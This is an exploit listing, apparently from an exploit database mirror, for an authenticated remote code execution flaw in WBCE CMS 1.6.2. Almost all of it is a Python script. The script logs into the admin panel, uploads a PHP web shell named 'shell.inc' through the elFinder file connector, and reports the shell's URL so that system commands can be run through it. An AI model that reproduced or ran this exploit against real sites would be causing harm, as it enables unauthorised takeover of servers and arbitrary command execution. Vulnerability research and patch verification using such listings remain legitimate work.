Share
## https://sploitus.com/exploit?id=PACKETSTORM:178891
# Exploit Title: WBCE CMS v1.6.2 - Remote Code Execution (RCE)  
# Date: 3/5/2024  
# Exploit Author: Ahmet Ümit BAYRAM  
# Vendor Homepage: https://wbce-cms.org/  
# Software Link:  
https://github.com/WBCE/WBCE_CMS/archive/refs/tags/1.6.2.zip  
# Version: 1.6.2  
# Tested on: MacOS  
  
import requests  
from bs4 import BeautifulSoup  
import sys  
import time  
  
def login(url, username, password):  
print("Logging in...")  
time.sleep(3)  
with requests.Session() as session:  
response = session.get(url + "/admin/login/index.php")  
soup = BeautifulSoup(response.text, 'html.parser')  
form = soup.find('form', attrs={'name': 'login'})  
form_data = {input_tag['name']: input_tag.get('value', '') for input_tag in  
form.find_all('input') if input_tag.get('type') != 'submit'}  
# Kullanıcı adı ve şifre alanlarını dinamik olarak güncelle  
form_data[soup.find('input', {'name': 'username_fieldname'})['value']] =  
username  
form_data[soup.find('input', {'name': 'password_fieldname'})['value']] =  
password  
post_response = session.post(url + "/admin/login/index.php", data=form_data)  
if "Administration" in post_response.text:  
print("Login successful!")  
time.sleep(3)  
return session  
else:  
print("Login failed.")  
print("Headers received:", post_response.headers)  
print("Response content:", post_response.text[:500]) # İlk 500 karakter  
return None  
  
def upload_file(session, url):  
# Dosya içeriğini ve adını belirleyin  
print("Shell preparing...")  
time.sleep(3)  
files = {'upload[]': ('shell.inc',"""<html>  
<body>  
<form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>">  
<input type="TEXT" name="cmd" autofocus id="cmd" size="80">  
<input type="SUBMIT" value="Execute">  
</form>  
<pre>  
<?php  
if(isset($_GET['cmd']))  
{  
system($_GET['cmd']);  
}  
?>  
</pre>  
</body>  
</html>""", 'application/octet-stream')}  
data = {  
'reqid': '18f3a5c13d42c5',  
'cmd': 'upload',  
'target': 'l1_Lw',  
'mtime[]': '1714669495'  
}  
response = session.post(url + "/modules/elfinder/ef/php/connector.wbce.php",  
files=files, data=data)  
if response.status_code == 200:  
print("Your Shell is Ready: " + url + "/media/shell.inc")  
else:  
print("Failed to upload file.")  
print(response.text)  
  
if __name__ == "__main__":  
url = sys.argv[1]  
username = sys.argv[2]  
password = sys.argv[3]  
session = login(url, username, password)  
if session:  
upload_file(session, url)